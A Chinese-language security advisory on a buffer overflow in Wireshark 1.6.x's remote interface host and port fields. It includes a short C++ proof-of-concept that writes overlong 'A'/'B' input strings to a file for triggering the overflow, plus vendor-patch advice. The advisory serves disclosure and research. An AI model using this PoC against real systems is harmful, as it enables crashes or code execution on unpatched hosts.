Wireshark远程界面缓冲区溢出漏洞

受影响系统:

Wireshark Wireshark 1.6.x

描述:


BUGTRAQ  ID: 55211

Wireshark(前称Ethereal)是一个网络分组分析软件。

Wireshark 1.6.0、1.8.2及其他版本在实现上存在缓冲区溢出漏洞,可允许远程攻击者在受影响应用中执行任意代码。

<*来源:X-h4ck
*>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

X-h4ck ()提供了如下测试方法:

#include <cstdio>
#include <iostream>
// wrote a little shit code to generate > nicely for u those strings
using namespace std;
int main(){

char buff1[] = “\x41”;
char buff2[] = “\x42”;
FILE *txtfile;
txtfile = fopen(“c:\\exploit.txt”, “w”);
fputs(“Host Input:\n”,txtfile);
for(int i=0; i < 659; i++){
fputs(buff1,txtfile);
}
fputs(“\n”,txtfile);
fputs(“Port Input:\n”,txtfile);
for (int y=0; y < 652; y++) {
fputs(buff1,txtfile);
}
for(int x=0; x < 8; x++) {
fputs(buff2,txtfile);
}
fclose(txtfile);
return 0;
}

建议:


厂商补丁:

Wireshark
———
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.wireshark.org/security/

评论关闭。